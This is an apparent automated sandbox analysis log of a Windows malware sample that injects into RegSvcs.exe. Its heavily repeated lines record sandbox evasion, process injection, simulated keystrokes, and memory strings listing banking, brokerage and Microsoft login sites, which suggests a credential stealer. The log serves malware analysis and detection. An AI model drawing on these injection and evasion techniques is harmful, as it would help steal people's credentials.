                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeAPI/Special instruction interceptor: Address: 123A7F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597702Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595909Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595011Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594896Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8189Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1650Jump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeAPI coverage: 4.6 %
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0038445A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038C6D1 FindFirstFileW,FindClose,0_2_0038C6D1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038C75C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038EF95
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038F0F2
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038F3F3
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003837EF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00383B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00383B12
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038BCBC
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597702Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595909Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595011Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594896Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4602611694.0000000001357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd32545f3d1fd1<
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeAPI call chain: ExitProcess graph end nodegraph_0-101113
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00393F09 BlockInput,0_2_00393F09
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00323B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00323B3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00355A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00355A7C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00324B37 LoadLibraryA,GetProcAddress,0_2_00324B37
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_01239430 mov eax, dword ptr fs:[00000030h]0_2_01239430
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0123AA60 mov eax, dword ptr fs:[00000030h]0_2_0123AA60
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0123AAC0 mov eax, dword ptr fs:[00000030h]0_2_0123AAC0
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003780A9
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034A124 SetUnhandledExceptionFilter,0_2_0034A124
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034A155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F43008Jump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003787B1 LogonUserW,0_2_003787B1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00323B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00323B3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003248D7
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00384C27 mouse_event,0_2_00384C27
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"Jump to behavior
